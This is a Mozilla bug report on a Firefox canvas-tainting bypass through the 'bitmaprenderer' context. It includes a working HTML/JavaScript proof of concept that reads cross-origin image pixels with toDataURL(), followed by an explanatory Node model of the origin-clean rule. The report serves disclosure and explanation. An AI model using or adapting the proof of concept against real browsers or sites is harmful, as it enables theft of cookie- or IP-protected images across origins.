Bug 1526218 Comment 0 Edit History
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36

Steps to reproduce:

If the crossorigin attribute is not specified for an image, the image may still be rendered into a canvas via a bitmap renderer context, and the pixel data can then be accessed by JavaScript. A proof of concept is shown below.

```html
<html><body>
<script charset="utf-8">
function getData() {
  createImageBitmap(this, 0, 0, this.naturalWidth, this.naturalHeight).then(function(bmap) {
    var can = document.createElement('canvas');
    var ctx = can.getContext('bitmaprenderer');
    ctx.transferFromImageBitmap(bmap);
    document.getElementById('result').textContent = can.toDataURL();
  });
}
</script>
<img src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/>
<br/><textarea readonly style="width:100%;height:10em" id="result"></textarea>
</body></html>
```

Actual results:

The image, which should not be accessible to JavaScript from origins other than https://duckduckgo.com, is in fact rendered in the tainted canvas and its base64-encoded contents are displayed. Images on external domains protected by cookies or IP whitelisting can therefore be stolen using Cross-site Request Forgery even if the target server does not give CORS access to other domains.

Expected results:

An error should have been thrown similar to the error shown when rendering tainted canvases in a 2D context: "The operation is insecure."
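The expected behaviour the report describes is the HTML canvas "origin-clean" rule: a bitmap created from a cross-origin image fetched without CORS approval is not origin-clean, a canvas that receives it must inherit that flag, and toDataURL() on a non-clean canvas must throw a SecurityError. The following is an added example, not code from the bug report or from Firefox; it is a small model of that rule written to run under Node, with the class and function names (makeImage, createImageBitmap, CanvasModel, readback, scenario2d, scenarioBitmapRenderer) and the origins being hypothetical. The propagateTaint switch models the difference between the correct rule and the reported behaviour, where the bitmaprenderer path did not carry the flag over.

```javascript
// Added example: a model of the origin-clean rule for canvases, not browser code.

class SecurityError extends Error {
  constructor() {
    super('The operation is insecure.');
    this.name = 'SecurityError';
  }
}

// A fetched image resource as the browser tracks it. crossOriginAllowed is true
// only when the <img> carried a crossorigin attribute AND the server's CORS
// response approved the page's origin.
function makeImage({ origin, pageOrigin, crossOriginAllowed = false }) {
  return {
    // Origin-clean when same-origin with the page or CORS-approved.
    originClean: origin === pageOrigin || crossOriginAllowed,
  };
}

// createImageBitmap(): the resulting bitmap inherits the source's flag.
function createImageBitmap(image) {
  return { originClean: image.originClean };
}

class CanvasModel {
  constructor() {
    this.originClean = true; // a fresh canvas starts clean
    this.bitmap = null;
  }

  // 2D context drawImage(): a non-clean source taints the canvas for good.
  drawImage(image) {
    if (!image.originClean) this.originClean = false;
  }

  // bitmaprenderer transferFromImageBitmap(): the canvas must take on the
  // bitmap's flag. propagateTaint=false models the reported bug, where the
  // flag was not carried over and the canvas stayed "clean".
  transferFromImageBitmap(bitmap, propagateTaint = true) {
    this.bitmap = bitmap;
    if (propagateTaint) this.originClean = bitmap.originClean;
  }

  // toDataURL() must refuse to serialize a tainted canvas.
  toDataURL() {
    if (!this.originClean) throw new SecurityError();
    return 'data:image/png;base64,<placeholder>'; // no real encoding in this model
  }
}

// Attempt a read-back and report whether pixels would have left the canvas.
function readback(canvas) {
  try {
    canvas.toDataURL();
    return 'leaked';
  } catch (e) {
    if (e instanceof SecurityError) return 'blocked';
    throw e;
  }
}

// Constructed scenario: a page on one origin loads an image from another,
// with no crossorigin attribute, so no CORS approval exists.
const PAGE_ORIGIN = 'https://page.example';
const IMAGE_ORIGIN = 'https://images.example';

function scenario2d() {
  const image = makeImage({ origin: IMAGE_ORIGIN, pageOrigin: PAGE_ORIGIN });
  const canvas = new CanvasModel();
  canvas.drawImage(image);
  return readback(canvas); // 'blocked': the 2D path already enforces the rule
}

function scenarioBitmapRenderer(propagateTaint) {
  const image = makeImage({ origin: IMAGE_ORIGIN, pageOrigin: PAGE_ORIGIN });
  const canvas = new CanvasModel();
  canvas.transferFromImageBitmap(createImageBitmap(image), propagateTaint);
  return readback(canvas); // 'blocked' when the flag propagates, 'leaked' otherwise
}

function sameOriginReadback() {
  const image = makeImage({ origin: PAGE_ORIGIN, pageOrigin: PAGE_ORIGIN });
  const canvas = new CanvasModel();
  canvas.transferFromImageBitmap(createImageBitmap(image));
  return readback(canvas); // 'leaked' is the correct outcome: same-origin data is readable
}

console.log('2D context:', scenario2d());
console.log('bitmaprenderer, flag propagated:', scenarioBitmapRenderer(true));
console.log('bitmaprenderer, flag dropped (reported bug):', scenarioBitmapRenderer(false));
console.log('same-origin bitmaprenderer:', sameOriginReadback());
```

The point the model makes is that every path that moves pixels into a canvas, drawImage and transferFromImageBitmap alike, has to propagate the origin-clean flag; a renderer that forgets it on one path turns toDataURL into a cross-origin read, which is exactly the report's "Actual results".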